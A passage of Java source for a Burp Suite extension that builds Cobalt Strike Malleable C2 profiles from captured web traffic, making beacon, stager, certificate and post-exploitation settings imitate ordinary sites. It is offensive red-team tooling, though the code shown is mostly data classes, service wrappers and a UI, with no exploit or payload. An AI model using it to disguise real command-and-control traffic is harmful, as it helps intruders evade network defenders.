    }

    public void setGet_server_prepend(String get_server_prepend) {
        this.get_server_prepend = get_server_prepend;
    }

    public String getGet_server_append() {
        return get_server_append;
    }

    public void setGet_server_append(String get_server_append) {
        this.get_server_append = get_server_append;
    }

    public String getGet_server_prepend2() {
        return get_server_prepend2;
    }

    public void setGet_server_prepend2(String get_server_prepend2) {
        this.get_server_prepend2 = get_server_prepend2;
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/model/HttpPostBeacon.java:
--------------------------------------------------------------------------------
package com.test.burp.model;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-10 15:30
 **/
public class HttpPostBeacon {
    private String http_post_uri;
    private String post_client_content;
    private String post_client_header1;
    private String post_client_header2;
    private String post_client_header3;
    private String post_client_header4;
    private String http_post_host;
    private String post_client_parameter1;
    private String post_client_parameter2;
    private String post_client_parameter3;
    private String post_server_server;
    private String post_server_content;
    private String post_server_header1;
    private String post_server_header2;
    private String post_server_header3;
    private String post_server_header4;
    private String post_client_encode;
    private String post_server_encode;
    private String post_server_prepend;
    private String post_server_prepend2;
    private String post_server_append;

    public String getHttp_post_uri() {
        return http_post_uri;
    }

    public void setHttp_post_uri(String http_post_uri) {
        this.http_post_uri = http_post_uri;
    }

    public String getPost_client_content() {
        return post_client_content;
    }

    public void setPost_client_content(String post_client_content) {
        this.post_client_content = post_client_content;
    }

    public String getPost_client_header1() {
        return post_client_header1;
    }

    public void setPost_client_header1(String post_client_header1) {
        this.post_client_header1 = post_client_header1;
    }

    public String getPost_client_header2() {
        return post_client_header2;
    }

    public void setPost_client_header2(String post_client_header2) {
        this.post_client_header2 = post_client_header2;
    }

    public String getPost_client_header3() {
        return post_client_header3;
    }

    public void setPost_client_header3(String post_client_header3) {
        this.post_client_header3 = post_client_header3;
    }

    public String getPost_client_header4() {
        return post_client_header4;
    }

    public void setPost_client_header4(String post_client_header4) {
        this.post_client_header4 = post_client_header4;
    }

    public String getPost_server_header1() {
        return post_server_header1;
    }

    public void setPost_server_header1(String post_server_header1) {
        this.post_server_header1 = post_server_header1;
    }

    public String getPost_server_header2() {
        return post_server_header2;
    }

    public void setPost_server_header2(String post_server_header2) {
        this.post_server_header2 = post_server_header2;
    }

    public String getPost_server_header3() {
        return post_server_header3;
    }

    public void setPost_server_header3(String post_server_header3) {
        this.post_server_header3 = post_server_header3;
    }

    public String getPost_server_header4() {
        return post_server_header4;
    }

    public void setPost_server_header4(String post_server_header4) {
        this.post_server_header4 = post_server_header4;
    }

    public String getHttp_post_host() {
        return http_post_host;
    }

    public void setHttp_post_host(String http_post_host) {
        this.http_post_host = http_post_host;
    }

    public String getPost_client_parameter1() {
        return post_client_parameter1;
    }

    public void setPost_client_parameter1(String post_client_parameter1) {
        this.post_client_parameter1 = post_client_parameter1;
    }

    public String getPost_client_parameter2() {
        return post_client_parameter2;
    }

    public void setPost_client_parameter2(String post_client_parameter2) {
        this.post_client_parameter2 = post_client_parameter2;
    }

    public String getPost_client_parameter3() {
        return post_client_parameter3;
    }

    public void setPost_client_parameter3(String post_client_parameter3) {
        this.post_client_parameter3 = post_client_parameter3;
    }

    public String getPost_server_server() {
        return post_server_server;
    }

    public void setPost_server_server(String post_server_server) {
        this.post_server_server = post_server_server;
    }

    public String getPost_server_content() {
        return post_server_content;
    }

    public void setPost_server_content(String post_server_content) {
        this.post_server_content = post_server_content;
    }

    public String getPost_client_encode() {
        return post_client_encode;
    }

    public void setPost_client_encode(String post_client_encode) {
        this.post_client_encode = post_client_encode;
    }

    public String getPost_server_encode() {
        return post_server_encode;
    }

    public void setPost_server_encode(String post_server_encode) {
        this.post_server_encode = post_server_encode;
    }

    public String getPost_server_prepend() {
        return post_server_prepend;
    }

    public void setPost_server_prepend(String post_server_prepend) {
        this.post_server_prepend = post_server_prepend;
    }

    public String getPost_server_append() {
        return post_server_append;
    }

    public void setPost_server_append(String post_server_append) {
        this.post_server_append = post_server_append;
    }

    public String getPost_server_prepend2() {
        return post_server_prepend2;
    }

    public void setPost_server_prepend2(String post_server_prepend2) {
        this.post_server_prepend2 = post_server_prepend2;
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/model/HttpStager.java:
--------------------------------------------------------------------------------
package com.test.burp.model;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-10 19:54
 **/
public class HttpStager {
    private String uri_x86;
    private String uri_x64;
    private String server_Content_Type;
    private String server_Server;
    private String server_header1;
    private String server_header2;
    private String server_header3;
    private String server_header4;
    private String output_prepend;
    private String output_append;
    private String client_Accept;
    private String output_encode;
    private String output_prepend2;

    public String getUri_x86() {
        return uri_x86;
    }

    public void setUri_x86(String uri_x86) {
        this.uri_x86 = uri_x86;
    }

    public String getUri_x64() {
        return uri_x64;
    }

    public void setUri_x64(String uri_x64) {
        this.uri_x64 = uri_x64;
    }

    public String getServer_Content_Type() {
        return server_Content_Type;
    }

    public void setServer_Content_Type(String server_Content_Type) {
        this.server_Content_Type = server_Content_Type;
    }

    public String getServer_Server() {
        return server_Server;
    }

    public void setServer_Server(String server_Server) {
        this.server_Server = server_Server;
    }

    public String getServer_header1() {
        return server_header1;
    }

    public void setServer_header1(String server_header1) {
        this.server_header1 = server_header1;
    }

    public String getServer_header2() {
        return server_header2;
    }

    public void setServer_header2(String server_header2) {
        this.server_header2 = server_header2;
    }

    public String getServer_header3() {
        return server_header3;
    }

    public void setServer_header3(String server_header3) {
        this.server_header3 = server_header3;
    }

    public String getServer_header4() {
        return server_header4;
    }

    public void setServer_header4(String server_header4) {
        this.server_header4 = server_header4;
    }

    public String getOutput_prepend() {
        return output_prepend;
    }

    public void setOutput_prepend(String output_prepend) {
        this.output_prepend = output_prepend;
    }

    public String getOutput_append() {
        return output_append;
    }

    public void setOutput_append(String output_append) {
        this.output_append = output_append;
    }

    public String getClient_Accept() {
        return client_Accept;
    }

    public void setClient_Accept(String client_Accept) {
        this.client_Accept = client_Accept;
    }

    public String getOutput_encode() {
        return output_encode;
    }

    public void setOutput_encode(String output_encode) {
        this.output_encode = output_encode;
    }

    public String getOutput_prepend2() {
        return output_prepend2;
    }

    public void setOutput_prepend2(String output_prepend2) {
        this.output_prepend2 = output_prepend2;
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/model/HttpsCertificate.java:
--------------------------------------------------------------------------------
package com.test.burp.model;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class HttpsCertificate {
    private String c;
    private String cn;
    private String ou;
    private String o;
    private String validity;

    public String getC() {
        return c;
    }

    public void setC(String c) {
        this.c = c;
    }

    public String getCn() {
        return cn;
    }

    public void setCn(String cn) {
        this.cn = cn;
    }

    public String getOu() {
        return ou;
    }

    public void setOu(String ou) {
        this.ou = ou;
    }

    public String getO() {
        return o;
    }

    public void setO(String o)
    {
        this.o = o;
    }

    public String getValidity() {
        return validity;
    }

    public void setValidity(String validity) {
        this.validity = validity;
    }

    @Override
    public String toString() {
        return "HttpsCertificate{" +
                "c='" + c + '\'' +
                ", cn='" + cn + '\'' +
                ", ou='" + ou + '\'' +
                ", o='" + o + '\'' +
                ", validity='" + validity + '\'' +
                '}';
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/model/Persiancat.java:
--------------------------------------------------------------------------------
package com.test.burp.model;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class Persiancat {
    private String timestamp;
    private String sample_name;
    private String sleeptime;
    private String jitter;
    private String data_jitter;
    private String tcp_port;
    private String useragent;
    private String host_stage;

    public String getTimestamp() {
        return timestamp;
    }

    public void setTimestamp(String timestamp) {
        this.timestamp = timestamp;
    }

    public String getSample_name() {
        return sample_name;
    }

    public void setSample_name(String sample_name) {
        this.sample_name = sample_name;
    }

    public String getSleeptime() {
        return sleeptime;
    }

    public void setSleeptime(String sleeptime) {
        this.sleeptime = sleeptime;
    }

    public String getJitter() {
        return jitter;
    }

    public void setJitter(String jitter) {
        this.jitter = jitter;
    }

    public String getData_jitter() {
        return data_jitter;
    }

    public void setData_jitter(String data_jitter) {
        this.data_jitter = data_jitter;
    }

    public String getTcp_port() {
        return tcp_port;
    }

    public void setTcp_port(String tcp_port) {
        this.tcp_port = tcp_port;
    }

    public String getUseragent() {
        return useragent;
    }

    public void setUseragent(String useragent) {
        this.useragent = useragent;
    }

    public String getHost_stage() {
        return host_stage;
    }

    public void setHost_stage(String host_stage) {
        this.host_stage = host_stage;
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/model/PostEx.java:
--------------------------------------------------------------------------------
package com.test.burp.model;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class PostEx {
    private String spawnto_x86;
    private String spawnto_x64;
    private String pipename;

    public String getSpawnto_x86() {
        return spawnto_x86;
    }

    public void setSpawnto_x86(String spawnto_x86) {
        this.spawnto_x86 = spawnto_x86;
    }

    public String getSpawnto_x64() {
        return spawnto_x64;
    }

    public void setSpawnto_x64(String spawnto_x64) {
        this.spawnto_x64 = spawnto_x64;
    }

    public String getPipename() {
        return pipename;
    }

    public void setPipename(String pipename) {
        this.pipename = pipename;
    }

    @Override
    public String toString() {
        return "PostEx{" +
                "spawnto_x86='" + spawnto_x86 + '\'' +
                ", spawnto_x64='" + spawnto_x64 + '\'' +
                ", pipename='" + pipename + '\'' +
                '}';
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/DnsBeaconService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import com.test.burp.model.DnsBeacon;

import java.util.Map;

public interface DnsBeaconService {
    DnsBeacon dataDnsBeacon();
    Map putdataDnsBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/HttpGetBeaconService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpGetBeacon;

import java.util.Map;

public interface HttpGetBeaconService {
    HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map putdataHttpGetBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/HttpPostBeaconService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpPostBeacon;

import java.util.Map;

public interface HttpPostBeaconService {
    HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map putdataHttpPostBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/HttpStagerService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpStager;

import java.util.Map;

public interface HttpStagerService {
    HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map putdataHttpStager();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/HttpsCertificateService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import com.test.burp.model.HttpsCertificate;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface HttpsCertificateService {
    HttpsCertificate dataHttpsCertificate();
    Map putdataHttpsCertificate();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/PersiancatService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import com.test.burp.model.Persiancat;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface PersiancatService {
    Persiancat dataPersiancat();
    Map putdataPersiancat();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/PostExService.java:
--------------------------------------------------------------------------------
package com.test.burp.service;

import com.test.burp.model.PostEx;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface PostExService {
    PostEx dataPostEx();
    Map putdataPostEx();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/DnsBeaconServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import com.test.burp.dao.DnsBeaconDao;
import com.test.burp.dao.impl.DnsBeaconDaoImpl;
import com.test.burp.model.DnsBeacon;
import com.test.burp.service.DnsBeaconService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-13 16:37
 **/
public class DnsBeaconServiceImpl implements DnsBeaconService {
    private DnsBeaconDao dnsBeaconDao = new DnsBeaconDaoImpl();

    @Override
    public DnsBeacon dataDnsBeacon() {
        return dnsBeaconDao.dataDnsBeacon();
    }

    @Override
    public Map putdataDnsBeacon() {
        // populate the model first, then read it back as template data
        this.dataDnsBeacon();
        return dnsBeaconDao.putdataDnsBeacon();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/HttpGetBeaconServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.dao.HttpGetBeaconDao;
import com.test.burp.dao.impl.HttpGetBeaconDaoImpl;
import com.test.burp.model.HttpGetBeacon;
import com.test.burp.service.HttpGetBeaconService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-10 15:25
 **/
public class HttpGetBeaconServiceImpl implements HttpGetBeaconService {
    private HttpGetBeaconDao httpGetBeaconDao = new HttpGetBeaconDaoImpl();

    @Override
    public HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) {
        return httpGetBeaconDao.dataHttpGetBeacon(callbacks, message);
    }

    @Override
    public Map putdataHttpGetBeacon() {
        return httpGetBeaconDao.putdataHttpGetBeacon();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/HttpPostBeaconServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.dao.HttpPostBeaconDao;
import com.test.burp.dao.impl.HttpPostBeaconDaoImpl;
import com.test.burp.model.HttpPostBeacon;
import com.test.burp.service.HttpPostBeaconService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-10 19:51
 **/
public class HttpPostBeaconServiceImpl implements HttpPostBeaconService {
    private HttpPostBeaconDao httpPostBeaconDao = new HttpPostBeaconDaoImpl();

    @Override
    public HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) {
        return httpPostBeaconDao.dataHttpPostBeacon(callbacks, message);
    }

    @Override
    public Map putdataHttpPostBeacon() {
        return httpPostBeaconDao.putdataHttpPostBeacon();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/HttpStagerServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.dao.HttpStagerDao;
import com.test.burp.dao.impl.HttpStagerDaoImpl;
import com.test.burp.model.HttpStager;
import com.test.burp.service.HttpStagerService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-11 15:46
 **/
public class HttpStagerServiceImpl implements HttpStagerService {
    private HttpStagerDao httpStagerDao = new HttpStagerDaoImpl();

    @Override
    public HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) {
        return httpStagerDao.dataHttpStager(callbacks, message);
    }

    @Override
    public Map putdataHttpStager() {
        return httpStagerDao.putdataHttpStager();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/HttpsCertificateServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import com.test.burp.dao.HttpsCertificateDao;
import com.test.burp.dao.impl.HttpsCertificateDaoImpl;
import com.test.burp.model.HttpsCertificate;
import com.test.burp.service.HttpsCertificateService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class HttpsCertificateServiceImpl implements HttpsCertificateService {
    private HttpsCertificateDao httpsCertificateDao = new HttpsCertificateDaoImpl();

    @Override
    public HttpsCertificate dataHttpsCertificate() {
        return httpsCertificateDao.dataHttpsCertificate();
    }

    @Override
    public Map putdataHttpsCertificate() {
        // populate the model first, then read it back as template data
        this.dataHttpsCertificate();
        return httpsCertificateDao.putdataHttpsCertificate();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/PersiancatServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import com.test.burp.dao.PersiancatDao;
import com.test.burp.dao.impl.PersiancatDaoImpl;
import com.test.burp.model.Persiancat;
import com.test.burp.service.PersiancatService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class PersiancatServiceImpl implements PersiancatService {
    private PersiancatDao persiancatDao = new PersiancatDaoImpl();

    @Override
    public Persiancat dataPersiancat() {
        return persiancatDao.dataPersiancat();
    }

    @Override
    public Map putdataPersiancat() {
        // populate the model first, then read it back as template data
        this.dataPersiancat();
        return persiancatDao.putdataPersiancat();
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/service/impl/PostExServiceImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.service.impl;

import com.test.burp.dao.PostExDao;
import com.test.burp.dao.impl.PostExDaoImpl;
import com.test.burp.model.PostEx;
import com.test.burp.service.PostExService;

import java.util.Map;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class PostExServiceImpl implements PostExService {
    private PostExDao postExDao = new PostExDaoImpl();

    @Override
    public PostEx dataPostEx() {
        return postExDao.dataPostEx();
    }

    @Override
    public Map putdataPostEx() {
        // populate the model first, then read it back as template data
        this.dataPostEx();
        return postExDao.putdataPostEx();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/testcode/FreemarkerDemo.java:
--------------------------------------------------------------------------------
package com.test.burp.testcode;

import com.test.burp.dao.impl.AnalyzeInfo;
import com.test.burp.dao.impl.LoadFile;
import com.test.burp.service.HttpsCertificateService;
import com.test.burp.service.PersiancatService;
import com.test.burp.service.PostExService;
import com.test.burp.service.impl.HttpsCertificateServiceImpl;
import com.test.burp.service.impl.PersiancatServiceImpl;
import com.test.burp.service.impl.PostExServiceImpl;
import freemarker.template.Configuration;
import freemarker.template.Template;

import java.io.File;
import java.io.IOException;
import java.io.StringWriter;
import java.text.SimpleDateFormat;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;

import static java.util.Arrays.asList;

/**
 * Scratch class used while developing the template rendering and the
 * header/URI/body helpers; not part of the Burp extension's runtime path.
 */
public class FreemarkerDemo {
    private final String TEMPLATE_PATH = "src/main/resources/templates";
    private static PersiancatService persiancatService = new PersiancatServiceImpl();
    private static HttpsCertificateService httpsCertificateService = new HttpsCertificateServiceImpl();
    private static PostExService postExService = new PostExServiceImpl();
    private static AnalyzeInfo analyzeInfo = new AnalyzeInfo();

    public FreemarkerDemo() {
        // step1: create the FreeMarker configuration instance
        Configuration configuration = new Configuration();
        try {
            // step2: set the template directory
            configuration.setDirectoryForTemplateLoading(new File(TEMPLATE_PATH));
            // step3: build the data model
            Map<String, Object> dataMap = new HashMap<>();
            dataMap.put("http_get_uri", new SimpleDateFormat("yyyy-MM-dd hh:mm:ss").format(new Date()));
            dataMap.put("get_client_header1", "AutoCode;\r\n\t\t1231231\r\n\t\ttyyttttt");
            // nextInt(30)+30 yields an integer in [30,60), which is then multiplied by 100
            dataMap.put("http_get_host", String.valueOf((new Random().nextInt(30) + 30) * 100));
            dataMap.put("http_getReq_Server", "15");
            // step4: load the template file
            Template template = configuration.getTemplate("test.ftl");
            // step5: render
            //Writer out = null;
            //out = new OutputStreamWriter(System.out);
            // step6: write the output
            StringWriter strWriter = new StringWriter();
            template.process(dataMap, strWriter);
            String str = strWriter.toString();
            System.out.println(str);
            // get the current time
            // Date date = new Date();
            // SimpleDateFormat dateFormat= new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
            // System.out.println(dateFormat.format(date));
        } catch (Exception e) {
            // e.printStackTrace();
            // } finally {
            //     try {
            //         if (null != out) {
            //             out.flush();
            //         }
            //     } catch (Exception e2) {
            //         e2.printStackTrace();
            //     }
        }
    }

    // Build 3 to 5 random "parameter" lines from the parameters wordlist
    public static String lookTestParameter() {
        int randnum = new Random().nextInt(3) + 3;
        List<String> list = new ArrayList<>(searchTestParam(randnum));
        StringBuilder line = new StringBuilder();
        String str = "qwertyuiopasdfghjklzxcvbnmZXCVBNMLKJHGFDSAQWERTYUIOP-1234567890_";

        for (int j = 0; j < randnum; j++) {
            StringBuilder strBuff = new StringBuilder();
            // shuffle the characters of str
            List<String> chars = new ArrayList<>(asList(str.split("")));
            Collections.shuffle(chars);
            str = String.join("", chars);
            // random value of 6 to 15 characters drawn from the shuffled alphabet
            int num = new Random().nextInt(10) + 6;
            for (int i = 0; i < num; i++) {
                int number = new Random().nextInt(str.length());
                strBuff.append(str.charAt(number));
            }
            if (j == 0) {
                line.append("parameter \"").append(list.get(j)).append("\" \"").append(strBuff).append("\";");
            } else {
                line.append("\r\n\t\tparameter \"").append(list.get(j)).append("\" \"").append(strBuff).append("\";");
            }
        }
        return line.toString();
    }

    // Draw randnum distinct names from the parameters wordlist; retries until all are distinct
    public static List<String> searchTestParam(int randnum) {
        List<String> list = new ArrayList<>();
        for (int i = 0; i < randnum; i++) {
            try {
                list.add(new LoadFile().readLine("parameters"));
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        list = list.stream().distinct().collect(Collectors.toList());
        if (list.size() == randnum) {
            return list;
        } else {
            return searchTestParam(randnum);
        }
    }

    // Pick a random, de-duplicated subset of the captured headers and render them as "header" lines
    public static String lookTestHeaders(Map<String, String> map) {
        List<String> listall = new ArrayList<>(map.keySet());
        List<String> list = new ArrayList<>();
        if (listall.size() > 3) {
            for (int j = 0; j < listall.size(); j++) {
                int num = new Random().nextInt(listall.size());
                list.add(listall.get(num));
            }
            list = list.stream().distinct().collect(Collectors.toList());
        } else {
            list.addAll(listall);
        }
        StringBuilder line = new StringBuilder();
        for (int i = 0; i < list.size(); i++) {
            if (i == 0) {
                line.append("header \"").append(list.get(i)).append("\" \"").append(map.get(list.get(i))).append("\";");
            } else {
                line.append("\r\n\t\theader \"").append(list.get(i)).append("\" \"").append(map.get(list.get(i))).append("\";");
            }
        }
        return line.toString();
    }

    // Extract the path (without query string) from the GET request line
    public static String lookUri(List<String> headers) {
        String uri = "";
        for (String header : headers) {
            if (header.startsWith("GET")) {
                uri = header.split("\\s+")[1].split("[?]")[0];
            }
        }
        // System.out.println(uri);
        return uri;
    }

    // format the uri: keep at most the first six path segments
    public static String formatUri(String uri) {
        List<String> list = asList(uri.split("/"));
        StringBuilder uriStr = new StringBuilder();
        if (list.size() <= 6) {
            uriStr = new StringBuilder(uri);
        } else {
            for (int i = 1; i < 7; i++) {
                uriStr.append("/").append(list.get(i));
            }
        }
        return uriStr.toString();
    }

    public static void main(String[] args) throws IOException {
        Map<String, Object> dataMap = new HashMap<>();
        // persiancatService.dataPersiancat();
        //dataMap.putAll(persiancatService.putdataPersiancat());
        //dataMap.putAll(httpsCertificateService.putdataHttpsCertificate());
        //dataMap.putAll(postExService.putdataPostEx());
        //System.out.println(dataMap);
        List<String> testlist = asList(
                "GET /og/_/js/k=og.qtm.en_US.spppbM4LMIk.O/rt=j/m=qabr,qgl,q_dnp,qdid,qcwid,qbg,qbd,qapid,qald/exm=qaaw,qadd,qaid,qein,qhaw,qhbr,qhch,qhga,qhid,qhin,qhpr/d=1/ed=1/rs=AA2YrTuopUsWYZY3-5Ts97yUUVoGW6GKgA HTTP/1.1",
                "Host: www.google.com",
                "Sec-Fetch-Dest: empty",
                "Sec-Fetch-Dest2: empty",
                "Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
                "Content-Type: text/plain;charset=UTF-8",
                "Referer: https://www.google.com/",
                "Accept-Encoding: gzip, deflate"
        );
        // System.out.println(dataMap.size());
        // String header = "Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Jr/dv0OrZoGbY5jRuHrS/Q==' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1";
        // List lists = Arrays.asList(header.split("[:]\\s+"));
        // String line = "";
        // for (int i = 0; i < lists.size(); i++){
        //     if (i == 0){
        //         System.out.println(lists.get(0));
        //     }else{
        //         line += lists.get(i);
        //     }
        //     System.out.println(line);
        // }
        // System.out.println(String.valueOf(header.split("[:]\\s+")[1]).trim());
        //
        // new FreemarkerDemo();
        // System.out.println(lookUri(testlist));
        // System.out.println(formatUri(lookUri(testlist)));
        //dataMap = analyzeInfo.lookHeaders(testlist);
        //System.out.println(lookTestHeaders(analyzeInfo.lookHeaders(testlist)));
        System.out.println(new Random().nextInt(39999) + 12500);
        List<String> list = new ArrayList<>();
        for (int i = 0; i < 5; i++) {
            list.add(i, "");
        }
        for (int i = 0; i < 5; i++) {
            list.set(i, "sdfsd");
        }
        System.out.println(list);
        //System.out.println(new ReadFile().readLoad("testhtml").substring(0,3000));
        //System.out.println(lookTestParameter());
        //System.out.println(new ReadFile().readLoad("testhtml").replaceAll("\"","\\\\\""));
    }

    // Replace \uXXXX escape sequences with the character they encode
    public static String decodeUnicode(String str) {
        Pattern p = Pattern.compile("\\\\u([0-9a-fA-F]{4})");
        Matcher m = p.matcher(str);
        StringBuilder sb = new StringBuilder();
        int start = 0;
        while (m.find(start)) {
            if (m.start() > start) {
                sb.append(str, start, m.start());
            }
            // the four hex digits are exactly one UTF-16 code unit
            sb.append((char) Integer.parseInt(m.group(1), 16));
            start = m.end();
        }
        if (str.length() > start) {
            sb.append(str, start, str.length());
        }
        return sb.toString();
    }

    // special-character handling: strip CJK characters, then escape backslashes and double quotes
    public static String moBody(String body) {
        body = body.replaceAll("[\u4e00-\u9fa5]", "");
        body = body.replaceAll("\\\\", "\\\\\\\\");
        body = body.replaceAll("\"", "\\\\\"");
        return body;
    }

    public static String formatHtml(String body) {
        // the pattern is empty in the source, so this first call is a no-op
        String str = body.replaceAll("", "");
        //str = str.replaceAll("/[*](.|[\r\n])*?[*]/","");
        str = str.replaceAll("\\\\", "\\\\\\\\");
        str = str.replaceAll("\t|\r|\n", "");
        return str;
    }

    // Split a response body into three quote-escaped chunks
    public static List<String> analyzeBody(String body) {
        List<String> list = new ArrayList<>();
        if (body.length() < 10000) {
            // short body: three equal thirds
            list.add(body.substring(0, body.length() / 3).replaceAll("\"", "\\\\\""));
            list.add(body.substring(body.length() / 3, body.length() / 3 * 2).replaceAll("\"", "\\\\\""));
            list.add(body.substring(body.length() / 3 * 2, body.length()).replaceAll("\"", "\\\\\""));
        } else {
            // long body: a random-length head, a slice around the middle, and a tail of the same length as the head
            int length1 = new Random().nextInt(600) + 3500;
            int length2 = body.length() - length1;
            int len = (length1 + length2) / 2 + new Random().nextInt(635) + 877;
            list.add(body.substring(0, length1).replaceAll("\"", "\\\\\""));
            list.add(body.substring((length1 + length2) / 2, len).replaceAll("\"", "\\\\\""));
            list.add(body.substring(length2, body.length()).replaceAll("\"", "\\\\\""));
        }

        return list;
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/ui/C2ui.java:
--------------------------------------------------------------------------------
package com.test.burp.ui;

import javax.swing.*;
import java.awt.*;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class C2ui extends JFrame {
    private JTextArea resArea;
    private JButton button;

    public C2ui() {
        super("C2 profile generator");
        JPanel codePanel = new JPanel(new GridLayout());

        // Text area that holds the generated C2 profile content
        resArea = new JTextArea();
        JScrollPane scrollPane = new JScrollPane(resArea);
        resArea.setEditable(false);

        this.add(codePanel, BorderLayout.CENTER);
        codePanel.add(scrollPane);

        // Button that copies the C2 profile to the system clipboard
        JPanel buttonPanel = new JPanel(new FlowLayout());
        button = new JButton("Copy Text");
        buttonPanel.add(button);
        this.add(buttonPanel, BorderLayout.PAGE_END);
        button.addActionListener(e1 -> {
            Toolkit toolkit = Toolkit.getDefaultToolkit();
            Clipboard clipboard = toolkit.getSystemClipboard();
            StringSelection codeToCopy = new StringSelection(this.getFile());
            clipboard.setContents(codeToCopy, codeToCopy);
        });

        // Window settings
        this.setSize(630, 530);
        this.setVisible(false);
        this.setDefaultCloseOperation(JFrame.DISPOSE_ON_CLOSE);
    }

    public void setFile(String str) {
        this.resArea.setText(str);
    }

    public String getFile() {
        return resArea.getText();
    }
}
--------------------------------------------------------------------------------
/src/main/resources/templates/c2profile_template.ftl:
--------------------------------------------------------------------------------
## Cobalt Strike Malleable C2 Profile
## Version: Cobalt Strike 4.2
## Date : ${timestamp}

## Profile Name
##set sample_name "${sample_name}";

## Sleep Times
set sleeptime "${sleeptime}";
set jitter "${jitter}";

## Beacon maxdns
set maxdns "${maxdns}";

## DNS servers
set dns_idle "${dns_idle}";

## Beacon User-Agent
set useragent "${useragent}";

## Self-signed SSL Certificates with SSL Beacon
## Stager
https-certificate {

